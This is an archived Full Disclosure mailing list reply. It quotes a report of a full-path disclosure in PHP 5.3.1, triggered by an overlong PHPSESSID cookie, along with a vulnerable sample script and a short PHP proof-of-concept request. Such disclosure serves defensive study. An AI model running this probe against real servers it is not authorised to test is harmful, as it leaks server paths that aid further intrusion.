Full Disclosure mailing list archives
Re: Path disclosure in PHP 5.3.1
From: Jeff Williams <jeffwillis30 () gmail com>
Date: Sun, 27 Dec 2009 17:01:59 +1100
Oh no a full path ! 2009/12/27 WHK <www.kernel32 () gmail com>
Make a script vulnerable: <?php session_start(); if($_SESSION) echo $_SESSION; else $_SESSION = 'xx'; ?> Now look the script in you explorer and change the value of cookie "PHPSESSID" to 300 chars "a" and look the disclosure: Warning: session_start() [function.session-start]: open(/tmp/sess_aaaaaaaaaaaaaaaaaa ..... aa in /opt/lampp/htdocs/test.php on line 3 PoC: <?php error_reporting(0); $payload = 'GET / HTTP/1.1 Host: 127.0.0.1 Connection: close Cookie: PHPSESSID='.str_repeat('a', 500).'; '; if(!$handle = fsockopen('127.0.0.1', 80)){ die('Error'); }else{ fputs($handle, $payload); while(!feof($handle)){ $retorno .= fread($handle, 1024); } echo nl2br(htmlspecialchars($retorno, ENT_QUOTES)); } ?> if value of cookie is "aaaaaaa" then file in temp of server is "sess_aaaaaaa", if value of cookie is ax300 dont make file and return the error message. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Path disclosure in PHP 5.3.1 WHK (Dec 26)
- Re: Path disclosure in PHP 5.3.1 Jeff Williams (Dec 26)
- <Possible follow-ups>
- Re: Path disclosure in PHP 5.3.1 Gynvael Coldwind (Dec 28)